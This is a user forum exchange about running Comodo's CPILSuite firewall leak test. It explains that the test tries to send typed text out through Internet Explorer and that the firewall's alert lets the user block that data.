I'm talking about the triple (3 button) test " CPILSuite " downloadable from COMODO site:
After pushing the first button (Test 1) at COMODO's request pop-up,
if you allow explorer.exe as parent for Iexplore.exe , IE browser will open
with the info typed, anouncing failure.
I've downloaded the CPILSuite and run the first test - the one you say leaks.
All I got was a firewall alert telling me that IE was trying to send data (the data is was trying to send was the data I typed into CPIL). I clicked BLOCK (without clicking "REMEMBER") and the data was not sent. Naturally if I had clicked ALLOW, the data would have been sent.
Not being funny, but do you fully understand the concept behind leak testers?
When you run a leak test, it will typically ask you to enter some data that it will attempt to transmit to a remote site, where you can view the data you typed in locally, thereby proving that the firewall has allowed the data to leak. After you have typed in the text, a good firewall will display an alert about IE attempting to trasmit data. At this point, the firewall still has not leaked as it is waiting for you to tell whether to leak or not.
If you click ALLOW, of course it's going to leak, because you explicitly told it to. If you click BLOCK, it won't, but the firewall has actually stopped IE dead in its tracks (because it is the communicating medium, not the leak test), not the leaktest. At this point you should reboot to run the next leak test (it's a good idea to reboot between each attempted leak test).
The KEY factor is to not click REMEMBER!!!!! The firewall alert is about IE, not the leaktest and if you click REMEMBER and BLOCK, you have just successfully blocked IE until you remove the application monitor rule.
There cannot be an automated response to this type of threat, as this type of threat keeps changing. How many leaktests were there two years ago? Maybe one or two. How many are there now? Around twenty. The nature of the threat changes and, as good as Comodo is, their crystal ball can't foresee what the bad guys will come up with next.
The problem is that most sophisticated code/dll injections involve this file, and for now, there is no way to make distinctive rules against exploiting it, without messing up all your Internet connections.
All we can do now is to block these attacks but only once, and then, most likely, reboot the system to get rid of the malicious injections.
What you say is exactly correct - what you've described IS all we can do. I would rather KNOW about each and every threat that managed to get inside my PC and be able to block it, than place blind trust (sorry Melih) in any security app. If the price of security is a handful of click and a little bit of awareness, then I for one am happy to pay that price.
Hope this helps,